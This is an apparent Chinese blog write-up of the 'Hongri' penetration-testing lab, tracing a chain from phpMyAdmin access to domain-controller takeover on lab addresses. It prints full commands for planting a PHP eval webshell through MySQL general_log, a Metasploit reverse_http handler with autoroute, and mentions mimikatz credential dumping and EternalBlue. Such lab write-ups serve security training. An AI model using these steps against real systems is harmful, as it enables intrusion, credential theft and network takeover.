红日靶场1

kali:192.168.157.137
windows7 :
外网ip: 192.168.157.128
内网ip: 192.168.52.143
win2K3:192.168.52.141
windows2008:192.168.52.138(域控主机)

环境配置

网络配置:
在这里插入图片描述

windows7
在这里插入图片描述

win2K3
在这里插入图片描述

windows2008
在这里插入图片描述

kali
在这里插入图片描述

开启win7中的PHP study
在这里插入图片描述

web渗透

用nmap扫描开放端口
在这里插入图片描述

发现开放80端口
访问80端口
在这里插入图片描述

利用御剑扫描目录,得到http://192.168.157.128/phpmyadmin/页面
在这里插入图片描述

可以使用密码爆破,但我这里看到别人写的密码就直接用了,用户名和密码都是root
登录页面
在这里插入图片描述

尝试用日志写入木马getshell
1.查看日志功能是否开启
show global variables like ‘%general%’
2.未开启的话设置为 on
set global general_log=‘ON’
3.开启后将日志文件的存储位置改为可访问到的目录, 根目录即可
set global general_log_file = ‘C:/phpStudy1/WWW/3.php’
4.执行下边一句话木马
数据库将会将查询语句保存在日志文件中
SELECT ‘<?php @eval($_POST["cmd"]); ?>’
5.写入成功后 使用蚁剑连接
在这里插入图片描述

我这里已经做过一次了,在win7下已经生成了3.php文件了,你们只要按照这个语句执行就行。

使用蚁剑连接
在这里插入图片描述

连接成功
在这里插入图片描述

拿下webshell之后进行一些简单的信息收集
在这里插入图片描述

内网信息探测

上线CS
在这里插入图片描述

点击耳机图标,创建新的监听器
在这里插入图片描述

利用CS生成exe可执行程序
在这里插入图片描述
在这里插入图片描述

上传到windows7上面
在这里插入图片描述

执行exe文件
在这里插入图片描述

看到靶机上线了
在这里插入图片描述

直接提权
在这里插入图片描述
在这里插入图片描述

运行mimikatz,获取密码
在这里插入图片描述

内网域环境信息的收集

使用 ipconfig /all 查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org
在这里插入图片描述

上面发现 DNS 服务器名为 god.org,当前登录域为 GOD,那接下来可执行net view /domain查看有几个域
在这里插入图片描述

感觉回显太慢,直接运行sleep 0,但在实操的时候是不能这样的,会被发现
在这里插入图片描述

只有一个域,那就利用 net group “domain controllers” /domain 命令查看域控制器主机名,直接确认域控主机的名称为 OWA

在这里插入图片描述

域控主机的名称为 OWA,点击准星那个图标,可得知域控主机的 IP 为 192.168.52.138
在这里插入图片描述

局域网扫描出来除了域控主机之外还有另一台主机(名称为ROOT-TVI862UBEH),最后再确认一下该主机是否也是存在域中,故执行命令net group “domain computers” /domain 查看域中的其他主机名,发现包含ROOT-TVI862UBEH,故域中还包含一个域成员主机192.168.52.141
在这里插入图片描述

至此内网域信息搜集完毕,已经明确了域控主机为192.168.52.138,同时还存在另一台域成员192.168.52.141,接下来的目标就是横向渗透拿下域控!

内网横向渗透

接下来将通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机
利用msf和CS联动

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
set lport 接受的端口
exploit 执行
在这里插入图片描述

然后到CS中创建新的foreign监听器
在这里插入图片描述

点击spawn,选择刚刚创建的监听器,就能看到msf生成了新的会话
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

配置路由

#加载MSF的autoroute模块,获取当前机器的所有网段信息
meterpreter > run post/multi/manage/autoroute
#添加目标内网路由
meterpreter > run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD
在这里插入图片描述

MSF内网端口扫描
扫出来192.168.52.141和192.168.52.138都开放了445端口,这就可以利用永恒之蓝漏洞

在这里插入图片描述
在这里插入图片描述

一开始我的445端口没开,我重启win2K3就又打开了

在这里插入图片描述

利用永恒之蓝漏洞拿下域控主机

在这里插入图片描述
在这里插入图片描述

执行命令screenshot截取目标靶机的屏幕,确认已拿下域控

在这里插入图片描述
在这里插入图片描述

利用msf去远程控制靶机我没实现,因为我的kali机没有联网,操作不了
在这里插入图片描述

以上就是全部拿到域控主机的过程。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值